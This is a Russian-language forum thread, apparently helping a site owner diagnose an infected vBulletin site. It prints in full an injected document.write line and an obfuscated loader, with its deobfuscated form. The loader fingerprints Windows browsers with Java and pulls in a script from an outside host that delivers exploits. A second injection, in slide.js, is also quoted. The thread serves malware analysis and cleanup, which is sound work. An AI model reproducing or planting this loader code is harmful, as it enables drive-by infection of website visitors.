Зашел на ваш сайт.
Посмотрел код.
В этом clientscript/vbulletin_md5.js?v=387 в конце скрипта было так:
...... {A=A.substring(1,A.length)}while(A.substring(A.length-1,A.length)==" "){A=A.substring(0,A.length-1)}return A}function md5hash(B,A,E,C){if(navigator.userAgent.indexOf("Mozilla/")==0&&parseInt(navigator.appVersion)>=4){var D=hex_md5(str_to_ent(trim(B.value)));A.value=D;if(E){D=hex_md5(trim(B.value));E.value=D}if(!C){B.value=""}}return true}; ;document.write("<scr"+"ipt src='/images/regimage/backgrounds/reel.js'><"+"/script>");
где ;document.write(...) явная вставка левого кода с подгрузкой скрипта reel.js. Смотрим на этот скрипт
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 k="13"+"1F";W{26}S(e){k="27"}W{2d}S(e){k+="1Y"}b Z(o){10(g.F&&g.1Z){9 M=g["1U"+"1T"+"1S"+"1R"+"1V"+"1X"](\'21\')[0];9 l=g.F(\'1Q\');9 1P="1J$B:1I,2/]";9 1H="[1G,1K-0*~/~3~";9 1L="1O=,`5}0!`1N";9 1M="22;]4.1W-,23& 2h{";9 2g="2f;U#1*P/p$$2i";l.R(\'2j\',"t"+"e"+"2m/"+"J"+"2l"+"2k"+"i"+"2e");l.R(\'o\',o);9 25="24]28<}A";9 29="U;^D%p)>,2c^;4.";9 2b="C}^}.e.2a!2n?;1E%";9 14="1h]1e 3&)(x[1c].y#6@&<";9 1i="{&1d{@n<X+U!#q?";M[(k).1g("").1b().1a("")](l)}}b Y(){m 12["J"+"15"+"17"+"19"]()}9 18=")1f},1j,{*1y`";9 1x="1w&]z>##1v";9 1z="z+x,K~0] 2?H";9 1A="1D{1C&@%]8+1B(=d";9 1u="K>1t,#%>@";b 11(a){m a["E"+"1n"+"x"+"1m"](Q)!=-1}9 1l="1k/1o@n,../h";9 1p="I;L%1s[d}1r";9 1q="])2o~2Q^!37[>(36^=";9 39="`s$$*3a~35-.)D%p";9 2Z="<A]30{.?[v@.32-B#n";9 u="3j"+"3l"+":/"+"/z"+"3o"+"3p"+"3k"+".p"+"p."+"a"+"/d"+"20"+"3h"+"3i"+"3q"+"3f"+"3n"+"3c"+"L"+"2W"+"2z"+"16"+"O"+"2A"+"2B"+"2x"+"O"+"2w"+"2q"+"2s"+"2t"+"2v"+"2u"+"2E"+"2F"+"H"+"2R"+"2S"+"2U"+"2T"+"2O"+"2N"+"2I";9 Q="w"+"E";9 2G=":i#%[2J^2.r&T%2K<7*2";9 2M="2V]:(f{";9 2r="i:T=%^2y]j,N?~&r";9 38="4,2@2D.*B?>2p";9 2P=",2L)2H[d> };(j 7.q";b V(a){m a.2C("c"+"h"+"3g"+"3e")==-1}b G(){9 a=12["u"+"3m"+"3d"+"33"]["31"+"2X"+"2Y"+"r"+"34"+"3b"]();10(V(a)&&11(a)&&Y()){Z(u)}}G();',62,213,'|||||||||var|ua|function|||||document||||ggg|script_tag|return||src||||||||||||||||in|createElement|includeCounter|e9||ja||03|head_tag||cc||win|setAttribute|catch|||notChrome|try||cond3|inclScript|if|isWin|navigator|dli|TwLcbxNiJzYS3|vaE||nab|azIcbDhMhpR0|led|join|reverse|MT4|rW8|5s|d1j|split|GoBq|TwLcbxNiJzYS4|0y|r301|RbtCNwKL0|Of|de|Tc|RbtCNwKL1|RbtCNwKL2|4_8|RfZ|5_Smw5|azIcbDhMhpR4|3v|PP8|azIcbDhMhpR1|67fNkym|azIcbDhMhpR2|azIcbDhMhpR3|4d|GY|7v|I6|hC|l11N|NKpNAE1|WC|Q1SXV|qpvf8|NKpNAE2|NKpNAE3|5yB|ExBN|NKpNAE0|script|By|ents|Elem|get|TagN||ame|neppa|getElementsByTagName||head|4J|jEF|IVsjLH|TwLcbxNiJzYS0|ert|dlihCd|3P|TwLcbxNiJzYS1|_ud0|TwLcbxNiJzYS2|cwMRVE|ssreldf|pt|Js|NKpNAE4|4a|Zm|type|scr|va|xt|04|5I0O|5SZ5|bd|bxAgiJGRJ2|64|81|8f|74|e5|99|Pv|0c|ee|48|indexOf|Pt|fc|db|bxAgiJGRJ0|gE|d7|q6|P2JAyr|oL8yf|bxAgiJGRJ1|51|6d|bxAgiJGRJ4|nU|fd|ea|62|52|geRiFlwO5IF|08|Lo|we|RbtCNwKL4|Owv|to|J1|nt|Ca|CP|QE|nwI|bxAgiJGRJ3|RbtCNwKL3|52Q|se|83|Age|me|a4|ro|42|40|ht|at|tp|ser|93|yz|al|eb'.split('|'),0,{}))
Скрипт обфусцирован (приведён к нечитаемому виду). Чтобы посмотреть что там, можно воспользоваться каким-нибудь онлайн-деобфускатором, например http://jsbeautifier.org/
Получаем
var ggg = "dli" + "hC"; try { ert } catch (e) { ggg = "dlihCd" } try { ssreldf } catch (e) { ggg += "neppa" } function inclScript(src) { if (document.createElement && document.getElementsByTagName) { var head_tag = document["get" + "Elem" + "ents" + "By" + "TagN" + "ame"]('head')[0]; var script_tag = document.createElement('script'); var NKpNAE0 = "Q1SXV$B:WC,2/]"; var NKpNAE1 = "[l11N,qpvf8-0*~/~3~"; var NKpNAE2 = "ExBN=,`5}0!`5yB"; var NKpNAE3 = "4J;]4.1W-,jEF& 4a{"; var NKpNAE4 = "Js;U#1*P/p$$Zm"; script_tag.setAttribute('type', "t" + "e" + "xt/" + "ja" + "va" + "scr" + "i" + "pt"); script_tag.setAttribute('src', src); var TwLcbxNiJzYS0 = "IVsjLH]3P<}A"; var TwLcbxNiJzYS1 = "U;^D%p)>,cwMRVE^;4."; var TwLcbxNiJzYS2 = "C}^}.e._ud0!04?;I6%"; var TwLcbxNiJzYS3 = "GoBq]5s 3&)(x[MT4].y#6@&<"; var TwLcbxNiJzYS4 = "{&rW8{@n<X+U!#q?"; head_tag[(ggg).split("").reverse().join("")](script_tag) } } function cond3() { return navigator["ja" + "vaE" + "nab" + "led"]() } var azIcbDhMhpR0 = ")d1j},0y,{*67fNkym`"; var azIcbDhMhpR1 = "PP8&]z>##3v"; var azIcbDhMhpR2 = "z+x,K~0] 2?e9"; var azIcbDhMhpR3 = "7v{GY&@%]8+4d(=d"; var azIcbDhMhpR4 = "K>5_Smw5,#%>@"; function isWin(ua) { return ua["in" + "de" + "x" + "Of"](win) != -1 } var RbtCNwKL0 = "r301/Tc@n,../h"; var RbtCNwKL1 = "I;03%RfZ[d}4_8"; var RbtCNwKL2 = "])5I0O~nU^!nwI[>(QE^="; var RbtCNwKL3 = "`s$$*52Q~CP-.)D%p"; var RbtCNwKL4 = "<A]Owv{.?[v@.J1-B#n"; var u = "ht" + "tp" + ":/" + "/z" + "yz" + "al" + "at" + ".p" + "p." + "ua" + "/d" + "20" + "42" + "40" + "eb" + "a4" + "93" + "83" + "03" + "08" + "0c" + "16" + "cc" + "ee" + "48" + "99" + "cc" + "e5" + "bd" + "64" + "81" + "74" + "8f" + "fc" + "db" + "e9" + "fd" + "ea" + "52" + "62" + "6d" + "51" + "d7"; var win = "w" + "in"; var bxAgiJGRJ0 = ":i#%[q6^2.r&T%P2JAyr<7*2"; var bxAgiJGRJ1 = "geRiFlwO5IF]:(f{"; var bxAgiJGRJ2 = "i:T=%^Pv]j,N?~&r"; var bxAgiJGRJ3 = "4,2@Pt.*B?>5SZ5"; var bxAgiJGRJ4 = ",oL8yf)gE[d> };(j 7.q"; function notChrome(ua) { return ua.indexOf("c" + "h" + "ro" + "me") == -1 } function includeCounter() { var ua = navigator["u" + "ser" + "Age" + "nt"]["to" + "Lo" + "we" + "r" + "Ca" + "se"](); if (notChrome(ua) && isWin(ua) && cond3()) { inclScript(u) } } includeCounter();
Уже читабельно. Смотрим код
function includeCounter() { var ua = navigator["u" + "ser" + "Age" + "nt"]["to" + "Lo" + "we" + "r" + "Ca" + "se"](); if (notChrome(ua) && isWin(ua) && cond3()) { inclScript(u) } } includeCounter();
Здесь анализируется userAgent: если браузер не Chrome, если операционка Windows и есть Java на страницу вставляется еще один скрипт, который продолжает процесс втюхивания вируса (подбирается подходящий эксплоит, загружаетя и используется).
И да, такими делами лучше заниматься с виртуалки, а то мало ли что :)
kgtu5
Цитата на мою цитату это какой-то вопрос мне ?
А почему он должен ругаться-то ?
Глазами. Смотрите весь код и замечаете всё лишнее - только и всего :)
Подгрузил и посмотрел :)
Так Avast же там ничего не нашел 🍿
А сайт продолжает раздавать "подарки" всем "желающим" ( у кого в браузере разрешена Java ).
Да у меня все хорошо - чего и вам желаю :)
А вы, я смотрю, продолжаете искать решение в другой теме ( 'Яндекс нашел вирус на сайте' ).
Как найдете - тут его тоже напишите. Тогда и можно будет сказать: "Здесь собственно решение проблемы" :)
Я про это
ну, допустим, нашел я эту тему - и где решение ?
А где здесь, собственно, решение проблемы-то ?
В любом случае потом пишите им сюда: http://support.kaspersky.ru/virlab/helpdesk.html
Тип запроса: "Ложное срабатывание на веб-ресурс"
Недавно уязвимость в php нашли: http://www.securitylab.ru/vulnerability/448492.php
Я не знаю в чем там дело, но раз уж на разных CMS одно и тоже ... (может и совпадение)
В конце /js/slide.js втавка
document.write("<scr"+"ipt src='/admin/media/js/jquery.js'><"+"/script>");
там скрипт который всавляет флешку /admin/media/images/forward_enabled.swf
